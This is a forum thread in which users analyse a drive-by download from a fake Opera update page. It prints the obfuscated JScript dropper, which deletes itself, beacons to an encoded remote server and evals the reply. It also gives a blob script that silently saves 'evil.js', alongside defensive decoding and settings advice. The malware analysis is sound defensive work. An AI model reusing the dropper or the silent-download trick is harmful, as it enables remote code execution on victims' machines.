  • I happened upon a compromised website while browsing the internet on Opera that redirected to a fake Opera page that asked me to update the browser supposedly for being outdated. The real webpage I was meant to be taken to (from a Google search) was meant to be a page on washing machine maintenance (so I wasn't browsing anything dodgy). The hijacked webpage had an obviously dodgy url and the download link for the fake update also had an obviously dodgy url, so I didn't click on anything, but I noticed that it did a drive-by download of a js file. Windows Defender didn't pick up anything, and I immediately deleted the js file. I searched on Opera forums to see if anyone else experienced a similar drive-by attack, and it seems like someone had an identical experience after visiting another compromised website. The user explains the experience here:

    That user had the drive-by attack in 2019, and I am disappointed that this hasn't been looked into and patched already. I am assuming my operating system (Win 10) to be compromised now, and I have to reformat the whole damn thing, and I only started using Opera since last week! Opera security must be like Swiss cheese, because I haven't had this problem on Safari, Firefox, Edge or Chrome. Just because the browser has a much smaller userbase doesn't mean it won't be exploited for vulnerability. Besides, someone posted about this vulnerability back in 2019, and it still hasn't been patched. Opera is Trash

  • @operaequalstrash Where was the .js file downloaded to? You weren't prompted to choose where the file should be saved to?

  • @operaequalstrash said in Drive-by download attack:

    I happened upon a compromised website

    What website? URL to it?

  • @leocg it was auto-downloaded to the Download folder, so no, I was not prompted whether to download the file. I noticed it because of the blue dot on the top right side of the browser window that shows up when something finishes downloading. The file name was something like Update. I Secure Erased the SSD this morning so I didn't take any screenshots.

  • @burnout426,Vinegar,and%20finally%20rinse%20with%20water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7

    I got there by clicking on a Google search result (as above). Like the other user experienced in 2019, the hijacked page looked 'professional' like a real Opera page with logos, but just with obviously dodgy link urls. The page was asking me to update Opera because it's outdated. I did not click on anything on the page, but it drive-by downloaded a js file into my Download folder.

    I am not sure about what exactly this drive-by did to my system, but nonetheless I Secure Erased my SSD this morning, and I'll have to reinstall Win10 later. It's a minor inconvenience, but I am more annoyed that Opera browser is vulnerable to an exploit like this. I was using it on its default setting with no downloaded plugins. The irony is that I started using Opera for its supposedly good security - haha what a joke of security it has. The last time I saw a drive-by like this was on IE on Windows XP.

  • @operaequalstrash By default Opera will show the save as dialog for executable files, that's why I asked.

  • @operaequalstrash So you searched for something on Google and, in the results page, clicked on the one that looked like the page you were searching for. Then, that page showed a pop-up or a message saying that you need to upgrade Opera?

  • @operaequalstrash said in Drive-by download attack:

    @burnout426 and vinegar.-,Vinegar,and finally rinse with water.&ved=2ahUKEwjVjp3A5vfvAhVdyjgGHVrlBEIQFjABegQIAxAF&usg=AOvVaw267HvzCCIl7hRTgOibLWS7

    I was able to trigger the update page for Chrome. There was no automatic download though. I will keep trying to get the false update page in Opera. However, in Chrome, clicking on the "update chrome" link:

    <a class="button eula-download-button download-button desktop-only hide-cros" href="blob:" id="buttonDownload" download="">Update Chrome</a>

    downloads a blob that represents a zip file. In the zip file is:


    try {
        var kasa = new ActiveXObject('Scripting.FileSystemObject');
        kasa['DeleteFile'](this['WScript']['ScriptFullName'], true);
    catch (e) {}
    var azke = ofznaboqag();
    var bjaqug = rhuxikbmicy(azke);
    while (azke < bjaqug) {
        azke = ofznaboqag();
    function rhuxikbmicy(cnifloefpi) {
        return cnifloefpi + 10000;
    function ofznaboqag() {
        return new Date()['getTime']();
    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');
    var mopemgeyb = ['a', tid];
    function sendRequest(mopemgeyb, ypjaliv5) {
        if(typeof ypjaliv5 === 'undefined') { ypjaliv5 = false; }
        var ysviwknoer = '', lukyjiv = '', azhewuv, awkyjugav='eval';
        for (var rebusid3 = 0; rebusid3 < mopemgeyb['length']; rebusid3++) {
            ysviwknoer += rebusid3 + '=' + encodeURIComponent(''+mopemgeyb[rebusid3]) + '&';
        ysviwknoer = fyup(ysviwknoer);
        try {
            var bospopibttu;
            bospopibttu = new ActiveXObject('MSXML2.XMLHTTP');
            bospopibttu['open']('POST', fguvakakam, false);
            if (bospopibttu['status'] == 200) {
                lukyjiv = bospopibttu['responseText'];
                if(lukyjiv) {
                    azhewuv = fwugym(lukyjiv);
                    if(ypjaliv5) {
                        return azhewuv;
                    else {
        } catch (e) {}
        return false;
    function rnugma(rebusid3) {
        var hebod = '00'+rebusid3['toString'](16);
        hebod = hebod['substr'](hebod['length']-2);
        return hebod;
    function fwugym(mpumeznxoxih) {
        var vjueqnuf, bvury9, rebusid3, lukyjiv = '';
        bvury9 = parseInt(mpumeznxoxih['substr'](0, 2), 16);
        vjueqnuf = mpumeznxoxih['substr'](2);
        for (rebusid3 = 0; rebusid3 < vjueqnuf['length']; rebusid3+=2) {
            lukyjiv += String['fromCharCode'](gcayhptecim(parseInt(vjueqnuf['substr'](rebusid3, 2), 16), bvury9));
        return lukyjiv;
    function fyup(mpumeznxoxih) {
        var bvury9 = 207, rebusid3, lukyjiv = '';
        for (rebusid3 = 0; rebusid3 < mpumeznxoxih['length']; rebusid3++) {
            lukyjiv += rnugma(mpumeznxoxih['charCodeAt'](rebusid3) ^ bvury9);
        return (rnugma(bvury9)+lukyjiv);
    function gcayhptecim(ebup, zavyb) {
        var amyn = '', rinnu, minif, rebusid3;
        ebup = nguho(ebup);
        zavyb = nguho(zavyb);
        for(rebusid3 = 0; rebusid3<ebup['length']; rebusid3++) {
            rinnu = ebup['substr'](rebusid3,1);
            minif = zavyb['substr'](rebusid3,1);
                else {
            else {
                else {
        return parseInt(amyn, 2);
    function nguho(ebup) {
        ebup = (+ebup)['toString'](2);
        var epwryihno = '00000000' + ebup;
        epwryihno = epwryihno['substr'](epwryihno['length'] - 8);
        return epwryihno;
    function kongahavha(imalsosu) {
        imalsosu = imalsosu.split('');
        var vhimylpi = '';
        for(var rwean=0; rwean<imalsosu['length']; rwean++) {
            if(rwean%2===1) vhimylpi += imalsosu[rwean];
        vhimylpi = dyah(vhimylpi);
        return vhimylpi;
    function dyah(cweawvyhco) {
        cweawvyhco = cweawvyhco.split('');
        var kogygku = '';
        for (var ajser = cweawvyhco['length'] - 1; ajser >= 0; ajser--) {
            kogygku += oqjrynixi(cweawvyhco, ajser);
        return kogygku;
    function oqjrynixi(ditew, aracfespy) {
        return ditew[aracfespy];

    As in, it's an executable Javascript file (Jscript) for Windows that's dangerous as long as you have Wscript enabled.


    var text;
    text="Hello world!";
    WScript.Echo(text); // shows the dialog when the file is run by Windows Script Host

    If you create test.js and double-left-click on it and it shows a dialog with "Hello world!", Windows Scripting Host is enabled and you might want to disable it.

    If you never actually executed the Opera update js you got, you should be okay.

  • For:

    var fguvakakam = kongahavha('mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu');
    var tid =  kongahavha('d0r0e5p');
    var wbz = kongahavha('m1cbgai0i4mag2vag');

    The functions translate that into:

    Also, if you see in the code, it requests something from a server and gets a response back. You'll also see at the beginning of the code that the file is set to delete itself after it runs.
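
The decoding described in the post above can be reproduced statically, without running the sample or contacting anything. This is an added example, not code from the thread: the function names are this example's own, and treating the encoded string as the POST body is an assumption, because the send call is missing from the excerpt.

```javascript
// Added example: static decoding of the sample's string obfuscation (Node.js).
// Nothing here executes the sample or makes a network request.

// kongahavha/dyah in the sample: keep the odd-indexed characters, then reverse.
function decodeString(s) {
  let kept = '';
  for (let i = 1; i < s.length; i += 2) kept += s[i];
  return kept.split('').reverse().join('');
}

// Defang a decoded indicator so it is not clickable in notes or tickets.
function defang(s) {
  return s.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// fyup in the sample: key byte as two hex digits, then each char XOR key as hex.
function encodeBody(plain, key) {
  const hex = (n) => ('00' + n.toString(16)).slice(-2);
  let out = hex(key);
  for (let i = 0; i < plain.length; i++) out += hex(plain.charCodeAt(i) ^ key);
  return out;
}

// Inverse of encodeBody, e.g. for a request body found in proxy logs.
// Returns null when the input is not an even-length hex string.
function decodeBody(hexBody) {
  if (!/^(?:[0-9a-f]{2})+$/i.test(hexBody)) return null;
  const key = parseInt(hexBody.slice(0, 2), 16);
  let out = '';
  for (let i = 2; i < hexBody.length; i += 2) {
    out += String.fromCharCode(parseInt(hexBody.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// The three obfuscated literals exactly as they appear in the sample.
const literals = {
  fguvakakam: 'mfciogx.w1sxc1q/gmeorcg.jahicdaexmzhxtnleaweywxuzne.snciggooelq.r3z0iaj7ydqbm2yfv/q/r:usxpmtmtqhu',
  tid: 'd0r0e5p',
  wbz: 'm1cbgai0i4mag2vag',
};
const decoded = {};
for (const [name, value] of Object.entries(literals)) decoded[name] = decodeString(value);

// sendRequest joins its array as "index=value&"; the sample builds ['a', tid].
// Assumption: this string, passed through fyup (fixed key 207), is the POST body.
const beacon = `0=a&1=${decoded.tid}&`;
const wire = encodeBody(beacon, 207);

console.log(defang(decoded.fguvakakam), decoded.tid, decoded.wbz);
console.log(wire, '->', decodeBody(wire));
```

The response decoder in the sample (`fwugym`) relies on `gcayhptecim`, whose body is not in the excerpt, so it is not reimplemented here.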

  • @leocg Yessir. The page that rendered was a somewhat official looking Opera update page that said my browser is out of date, click here to update. The js file just downloaded even without me clicking on anything...

  • @burnout426 it seems like WSH is enabled by default on Windows, and I had never disabled it when this drive-by happened. Either way, I secure erased my SSD, and reinstalled Win10 since there were some work files that are security sensitive.

    If Opera shows a save as dialog for executable files by default as @leocg mentioned, shouldn't it show a dialog for a Jscript file when a webpage is trying to download it onto my machine? I get that it isn't much of a concern unless I execute the downloaded file, but this is just another way for an attack to bypass the browser sandbox, and get one step closer to having it executed (whether by mistake by the user or whatever). I reported the incident to Opera.

  • @operaequalstrash Do you need to do anything to trigger the update message? I opened the link on Opera Stable 75 and Developer 77 and couldn't see anything related to Opera upgrade.

  • @leocg I didn't have to do anything special in Chrome. But, it only happened after a few times of loading the link and only happened once. I have yet to trigger it in Opera to see if the js file gets dumped by itself in the downloads folder without asking.

  • I don't know if this works for a remote html file, but it does for a local one:


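        // Demo: build a harmless JScript file in memory and save it through a download link.
        window.addEventListener("DOMContentLoaded", function() {
            // The MIME type belongs on the Blob; createObjectURL() takes no options.
            var b = new Blob(['WScript.Echo("Hello World");'], {type: "application/javascript"});
            var u = URL.createObjectURL(b);
            var a = document.createElement("a");
            a.href = u;
            a.download = "evil.js";
            a.textContent = "Update";
            document.body.appendChild(a);
            a.click(); // programmatic click: the download starts without user interaction
        }, false);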

    That will automatically dump evil.js in your download folder. You can double-left-click the file and Windows will ask you if you want to run it (as long as you didn't uncheck the "always ask" box in that dialog before).

    You do get a notification in Opera that the download happened. But in Chrome, in the notification, you get a warning and an option to discard the download.

    I can't say that this is how the site does it in Opera as I haven't been able to trigger the update page on that site in Opera.

  • @burnout426 the hijacked page must be doing a crude browser fingerprinting before rendering the fake update page, since you are getting one for Chrome, but not Opera, whereas I got one on Opera. All I can tell you about the condition that triggered the page for me on Opera was that I installed Opera 1 week prior to that, and everything was on its default setting - no additional plug ins.

    In fact, this situation is identical to this user's:

    He got the hijacked page on Opera, and you got the hijacked page on Chrome. I suspect that the hijacked page rotates the target browser so as not to alert the site admin that it was hijacked. That way if one user on Chrome gets the drive-by and alerts the admin only for the site admin to check out the site on Opera, he would see a normal page with no driveby and would more likely suspect that it was the user's machine that was hijacked rather than the site. Either way, at least I know that Chrome will ask its users if they want to proceed with the download, if there is an attempt at a drive-by download. So in this regard, Chrome isn't as trashy as Opera.

  • For my demo at least, if you go to the URL opera://settings/downloads and enable "Ask where to save each file before downloading", you'll get prompted to download the js file where you can cancel it.

  • @burnout426 That should be the default setting, given how easily hijacked pages can pull a drive-by.